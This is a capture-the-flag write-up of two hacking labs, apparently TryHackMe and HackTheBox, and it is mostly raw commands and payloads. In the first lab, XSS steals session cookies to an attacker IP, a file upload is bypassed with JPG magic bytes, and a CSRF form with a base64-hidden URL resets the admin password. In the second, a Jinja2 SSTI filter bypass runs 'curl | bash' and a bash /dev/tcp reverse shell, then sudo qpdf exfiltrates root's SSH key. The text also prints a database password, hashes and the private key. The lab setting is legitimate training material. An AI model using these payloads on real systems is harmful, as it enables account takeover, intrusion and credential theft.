# XSS to Admin [TOC] # LAB -1 XSS-Register page (Steal Cookie)/ CSRF - Chat Rome (Reset Admin Password) (NO filter) https://tryhackme.com/r/room/whatsyourname Recon ``` TARGET_IP=10.10.170.126 nmap TARGET_IP nmap TARGET_IP -sV -sC ``` ![圖片](https://hackmd.io/_uploads/HyFIsP4GR.png) ``` TARGET_DOMAIN='worldwap.thm' echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts ``` Directory Enumerate Initial Scanning ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$TARGET_IP -t 10 ``` ![圖片](https://hackmd.io/_uploads/SyNw2D4GC.png) Website -> PHP DB Login ! ![圖片](https://hackmd.io/_uploads/HkQhnDVzR.png) Enumerate PHP file ! ``` gobuster dir -w /usr/share/wordlists/dirb/common.txt -x php -u http://$TARGET_IP/ -t 10 ``` ``` http://10.10.170.126/login.php ``` ![圖片](https://hackmd.io/_uploads/SJFUaPNMA.png) ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://$TARGET_IP/ -t 30 ``` ![圖片](https://hackmd.io/_uploads/SJ-I0vNG0.png) Register Page http://worldwap.thm/public/html/register.php ![圖片](https://hackmd.io/_uploads/SyyCCPVfA.png) Register Page didn't have HTTP only Attempt inject XSS to fetch token ``` python3 -m http.server 80 ``` ``` <svg onload="fetch('http://10.6.70.160:80?id=1', {method: 'POST',mode: 'no-cors',body: document.cookie});"></svg> ``` ![圖片](https://hackmd.io/_uploads/S1pig_4GC.png) ![圖片](https://hackmd.io/_uploads/SJ-mzdNM0.png) ``` PHPSESSID=2a7uibfrhdir3emrgra2j7b0bi ``` ![圖片](https://hackmd.io/_uploads/SkCVEOVM0.png) Access `login.worldwap.thm` ``` TARGET_DOMAIN='login.worldwap.thm' echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts ``` ![圖片](https://hackmd.io/_uploads/HJqZB_NzC.png) ![圖片](https://hackmd.io/_uploads/rk8rvuEf0.png) ![圖片](https://hackmd.io/_uploads/HJM8vu4MR.png) ``` gobuster dir -w /usr/share/wordlists/dirb/common.txt -u worldwap.thm -t 30 ``` ``` gobuster dir -w /usr/share/wordlists/dirb/common.txt -x php -u worldwap.thm/public/html/ -t 30 --cookies 'PHPSESSID=2pl85dtr7icq9mi6qv1acnokpd' ``` Add cookie ! ![圖片](https://hackmd.io/_uploads/HJffsu4G0.png) Upload ``` <?php phpinfo() ?> ``` Upload Bypass Magic Number JPG ``` FF D8 FF E0 ``` ``` XXXX <?php phpinfo() ?> ``` ``` hexedit test.php ``` F2 save ctrl + X : exit F1 : command help ![圖片](https://hackmd.io/_uploads/Hkyt1YNz0.png) ![圖片](https://hackmd.io/_uploads/rJhkeKVzA.png) ![圖片](https://hackmd.io/_uploads/rkF-ltVz0.png) Upload Bypass Chat Room ``` http://login.worldwap.thm/chat.php ``` Testing XSS Work ``` <svg onload="&#97;&#108;&#101;&#114;&#116;(1)"></svg> ``` ![圖片](https://hackmd.io/_uploads/rJFuzYVGC.png) Reset Password ``` <html> <body> <form action="http://login.worldwap.thm/change_password.php" method="POST"> <input type="hidden" name="new_password" value="meowmeow" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` ![圖片](https://hackmd.io/_uploads/ByxaXF4M0.png) Base64 encode URL bypass ``` <html> <body> <form id="myForm" method="POST"> <input type="hidden" name="new_password" value="meowmeow" /> </form> <script> var form = document.getElementById("myForm"); var actionUrl = atob("aHR0cDovL2xvZ2luLndvcmxkd2FwLnRobS9jaGFuZ2VfcGFzc3dvcmQucGhw"); form.setAttribute("action", actionUrl); form.submit(); </script> </body> </html> ``` Work !!!! ![圖片](https://hackmd.io/_uploads/HkjLvYVG0.png) ``` AdM!nP@wnEd ``` admin Session ``` PHPSESSID=vr904o45mohb1lhj2o3kt8b7lu ``` Solved !!  # Lab-2 : XSS - Send Message From (steal Cookie)/ User input be insecure embedding to Template SSTI/XSS (pyhton) -> SSTI RCE (filter bypass) / Sudo - qpdf read /root/.ssh/id_ras ``` TARGET_IP=10.10.11.12 TARGET_DOMAIN='capiclean.htb/' ``` ``` nmap $TARGET_IP -sV -sC -T4 ``` ![圖片](https://hackmd.io/_uploads/BkDwblFf0.png) ``` echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts ``` ``` gobuster dir -w /usr/share/wordlists/dirb/common.txt -u -x .py http://$TARGET_IP -t 10 -k ``` ``` <img src=x onerror=fetch(`//10.10.14.79:443/?A=${encodeURIComponent(document.cookie)}`);> ``` ![圖片](https://hackmd.io/_uploads/BJQHdgYM0.png) ``` session%3DeyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zjr5MQ.Deh8SN1QxslwHu6Owubhq7fC_lc session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zjr5MQ.Deh8SN1QxslwHu6Owubhq7fC_lc ``` ![圖片](https://hackmd.io/_uploads/rJQDYetGA.png) Access DashBoard Via Cookie ![圖片](https://hackmd.io/_uploads/rksW5gKMR.png) ![圖片](https://hackmd.io/_uploads/Hk5_cxtzC.png) ![圖片](https://hackmd.io/_uploads/SynWogKfC.png) ![圖片](https://hackmd.io/_uploads/H1x4ogKMR.png) ![圖片](https://hackmd.io/_uploads/rJqe3xtGC.png) ``` "><iMg src=x onerror=\70rompt`meow`> "><iMg src=x onerror=&#00000000000000000000000000000000000000000097;&#108;&#101;&#114;&#116;`meow`> ``` ![圖片](https://hackmd.io/_uploads/HJwuneFf0.png) Reflect - XSS SSTI Injecting ![圖片](https://hackmd.io/_uploads/rki6RetfA.png) ![圖片](https://hackmd.io/_uploads/SJ5gkZFz0.png) ![圖片](https://hackmd.io/_uploads/B1TMkZtMC.png) Template -> Jinja2 (Python) ``` {% import os %}{{os.system('whoami')}} ``` Fail ![圖片](https://hackmd.io/_uploads/BywCy-YMC.png) ``` bash -i >& /dev/tcp/10.10.14.79/443 0>&1 ``` ![圖片](https://hackmd.io/_uploads/r1kMfbtfC.png) ``` {{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.10.14.79:80/reshell | bash")|attr("read")()}} ``` ![圖片](https://hackmd.io/_uploads/BkoBf-tM0.png) Get Reverse Shell !! ![圖片](https://hackmd.io/_uploads/ByO_4bYMA.png) ``` host': '127.0.0.1', 'user': 'iclean', 'password': 'pxCsmnGLckUb', 'database': 'capiclean' ``` SSh login fail ![圖片](https://hackmd.io/_uploads/HJNIHWtMA.png) ![圖片](https://hackmd.io/_uploads/HyPKSWKGC.png) ![圖片](https://hackmd.io/_uploads/SkQRB-Kz0.png) ``` 1 | admin | 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51 | 21232f297a57a5a743894a0e4a801fc3 | | 2 | consuela | 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa | ee11cbb19052e40b07aac0ca060c23ee | ``` ![圖片](https://hackmd.io/_uploads/SJql8WKfA.png) ![圖片](https://hackmd.io/_uploads/HkaQL-YG0.png) ``` simple and clean ``` ![圖片](https://hackmd.io/_uploads/BJ8u8bKfC.png) Exploit ``` sudo qpdf --empty /tmp/rsa.txt --qdf --add-attachment /root/.ssh/id_rsa -- ``` ![圖片](https://hackmd.io/_uploads/B1XU9btMC.png) ``` -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS 1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B AgMEBQ== -----END OPENSSH PRIVATE KEY----- ``` ``` chmod 600 rsa ssh root@10.10.11.12 -i rsa ``` ![圖片](https://hackmd.io/_uploads/HJ9mjZKzR.png) solved